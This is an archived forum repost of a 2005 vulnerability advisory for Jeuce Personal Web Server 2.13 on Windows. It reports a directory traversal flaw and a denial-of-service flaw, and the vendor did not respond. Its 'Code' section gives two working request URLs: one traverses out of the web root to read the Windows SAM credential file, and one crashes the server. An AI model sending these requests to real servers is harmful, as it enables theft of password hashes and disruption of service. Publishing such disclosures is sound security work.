邪恶八进制信息安全团队技术讨论组's Archiver

冰血封情 2005-1-7 22:29

[转载]Jeuce Personal Web Server Remote Flaw

信息来源:securitytracker.com

====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Jeuce Personal Web Server
Web Site: [url]www.jeuce.com[/url]
Versions: 2.13
Platform: Windows
Bugs :
1) Directory Traversal
2) D.O.S


Credits:
########

#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Web : [url]www.gssit.co.il[/url] #
# #
# Email : [email]gss_it@yahoo.com[/email] #
# #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

The Jeuce Personal Web Server has helped thousands of people just like you to expand the use of their
computer in just minutes after downloading.
We've created the most user-friendly web server on the market so ANYONE can take advantage of the gre
at uses of the webserver.

=======
2) Bugs
=======

1) Directory Traversal


2) D.O.S


===========
3) The Code
===========


1) http://[Target]/../winnt/repair/sam



2) http://[Target]/://



======
4) Fix
======

Date of Vendor Notification:
----------------------------

15/12/04

Status:
-------

No Response.

页: [1]
© 1999-2008 EvilOctal Security Team